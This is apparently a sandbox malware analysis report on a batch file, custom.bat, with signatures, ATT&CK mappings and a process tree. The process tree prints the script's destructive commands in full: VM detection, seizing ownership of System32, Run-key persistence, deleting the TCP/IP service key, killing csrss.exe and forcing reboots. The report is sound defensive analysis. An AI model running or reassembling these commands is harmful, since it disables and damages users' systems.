1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3

Analysis

max time kernel
46s
max time network
50s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/09/2024, 06:41

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

custom.bat
Size

2KB
MD5

6482067516f0f24cdc0a596de66c951a
SHA1

9a77d1d6bc48250c98e57af675dec3a2dac51ed8
SHA256

1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3
SHA512

25fa1d45b9a10e97cded264824bae7e2d149850d2e0a618b448f434aedee160b7f014dca765aadd501d064e952effe5393d0163dd0cfe1bd8c03de593c037e86

Score

8^/10

discovery evasion execution exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 3 IoCs

exploit

pid	Process
680	icacls.exe
264	icacls.exe
2444	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2444	takeown.exe
680	icacls.exe
264	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2812	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2040	tasklist.exe
1196	tasklist.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2116	sc.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2252	ipconfig.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2540	systeminfo.exe
1788	systeminfo.exe
996	systeminfo.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1684	taskkill.exe
2368	taskkill.exe
1932	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1600	reg.exe
2364	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2040	tasklist.exe
Token: SeDebugPrivilege	1196	tasklist.exe
Token: SeTakeOwnershipPrivilege	2444	takeown.exe
Token: SeShutdownPrivilege	2240	shutdown.exe
Token: SeRemoteShutdownPrivilege	2240	shutdown.exe
Token: SeShutdownPrivilege	1888	shutdown.exe
Token: SeRemoteShutdownPrivilege	1888	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2684	2780	cmd.exe	31
PID 2780 wrote to memory of 2684	2780	cmd.exe	31
PID 2780 wrote to memory of 2684	2780	cmd.exe	31
PID 2684 wrote to memory of 2812	2684	cmd.exe	33
PID 2684 wrote to memory of 2812	2684	cmd.exe	33
PID 2684 wrote to memory of 2812	2684	cmd.exe	33
PID 2812 wrote to memory of 2724	2812	powershell.exe	34
PID 2812 wrote to memory of 2724	2812	powershell.exe	34
PID 2812 wrote to memory of 2724	2812	powershell.exe	34
PID 2684 wrote to memory of 2540	2684	cmd.exe	36
PID 2684 wrote to memory of 2540	2684	cmd.exe	36
PID 2684 wrote to memory of 2540	2684	cmd.exe	36
PID 2684 wrote to memory of 2560	2684	cmd.exe	37
PID 2684 wrote to memory of 2560	2684	cmd.exe	37
PID 2684 wrote to memory of 2560	2684	cmd.exe	37
PID 2684 wrote to memory of 1788	2684	cmd.exe	40
PID 2684 wrote to memory of 1788	2684	cmd.exe	40
PID 2684 wrote to memory of 1788	2684	cmd.exe	40
PID 2684 wrote to memory of 2208	2684	cmd.exe	41
PID 2684 wrote to memory of 2208	2684	cmd.exe	41
PID 2684 wrote to memory of 2208	2684	cmd.exe	41
PID 2684 wrote to memory of 996	2684	cmd.exe	42
PID 2684 wrote to memory of 996	2684	cmd.exe	42
PID 2684 wrote to memory of 996	2684	cmd.exe	42
PID 2684 wrote to memory of 2604	2684	cmd.exe	43
PID 2684 wrote to memory of 2604	2684	cmd.exe	43
PID 2684 wrote to memory of 2604	2684	cmd.exe	43
PID 2684 wrote to memory of 2040	2684	cmd.exe	44
PID 2684 wrote to memory of 2040	2684	cmd.exe	44
PID 2684 wrote to memory of 2040	2684	cmd.exe	44
PID 2684 wrote to memory of 1692	2684	cmd.exe	45
PID 2684 wrote to memory of 1692	2684	cmd.exe	45
PID 2684 wrote to memory of 1692	2684	cmd.exe	45
PID 2684 wrote to memory of 1196	2684	cmd.exe	46
PID 2684 wrote to memory of 1196	2684	cmd.exe	46
PID 2684 wrote to memory of 1196	2684	cmd.exe	46
PID 2684 wrote to memory of 2268	2684	cmd.exe	47
PID 2684 wrote to memory of 2268	2684	cmd.exe	47
PID 2684 wrote to memory of 2268	2684	cmd.exe	47
PID 2684 wrote to memory of 2444	2684	cmd.exe	48
PID 2684 wrote to memory of 2444	2684	cmd.exe	48
PID 2684 wrote to memory of 2444	2684	cmd.exe	48
PID 2684 wrote to memory of 680	2684	cmd.exe	49
PID 2684 wrote to memory of 680	2684	cmd.exe	49
PID 2684 wrote to memory of 680	2684	cmd.exe	49
PID 2684 wrote to memory of 264	2684	cmd.exe	50
PID 2684 wrote to memory of 264	2684	cmd.exe	50
PID 2684 wrote to memory of 264	2684	cmd.exe	50
PID 2684 wrote to memory of 588	2684	cmd.exe	51
PID 2684 wrote to memory of 588	2684	cmd.exe	51
PID 2684 wrote to memory of 588	2684	cmd.exe	51
PID 2684 wrote to memory of 1600	2684	cmd.exe	52
PID 2684 wrote to memory of 1600	2684	cmd.exe	52
PID 2684 wrote to memory of 1600	2684	cmd.exe	52
PID 2684 wrote to memory of 1684	2684	cmd.exe	53
PID 2684 wrote to memory of 1684	2684	cmd.exe	53
PID 2684 wrote to memory of 1684	2684	cmd.exe	53
PID 2684 wrote to memory of 2368	2684	cmd.exe	54
PID 2684 wrote to memory of 2368	2684	cmd.exe	54
PID 2684 wrote to memory of 2368	2684	cmd.exe	54
PID 2684 wrote to memory of 2252	2684	cmd.exe	55
PID 2684 wrote to memory of 2252	2684	cmd.exe	55
PID 2684 wrote to memory of 2252	2684	cmd.exe	55
PID 2684 wrote to memory of 2404	2684	cmd.exe	56

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process cmd -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2724
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:2540
- - C:\Windows\system32\findstr.exe
    findstr /i "VirtualBox"
    3⤵
    PID:2560
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1788
- - C:\Windows\system32\findstr.exe
    findstr /i "VMware"
    3⤵
    PID:2208
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:996
- - C:\Windows\system32\findstr.exe
    findstr /i "Hyper-V"
    3⤵
    PID:2604
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- - C:\Windows\system32\findstr.exe
    findstr /i "vmsrvc.exe"
    3⤵
    PID:1692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1196
- - C:\Windows\system32\findstr.exe
    findstr /i "VBoxService.exe"
    3⤵
    PID:2268
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:680
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:264
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
    3⤵
    - Adds Run key to start application
    PID:588
- - C:\Windows\system32\reg.exe
    reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1600
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmsrvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1684
- - C:\Windows\system32\taskkill.exe
    taskkill /IM VBoxService.exe /F
    3⤵
    - Kills process with taskkill
    PID:2368
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2252
- - C:\Windows\system32\netsh.exe
    netsh interface ip delete arpcache
    3⤵
    PID:2404
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\Tcpip /f
    3⤵
    - Modifies registry key
    PID:2364
- - C:\Windows\system32\sc.exe
    sc stop i8042prt
    3⤵
    - Launches sc.exe
    PID:2116
- - C:\Windows\system32\taskkill.exe
    taskkill /IM csrss.exe /F
    3⤵
    - Kills process with taskkill
    PID:1932
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2240
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1888
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:2172
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 0
    3⤵
    PID:3044

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2392

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2812-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2812-6-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2812-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-7-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2812-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-12-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads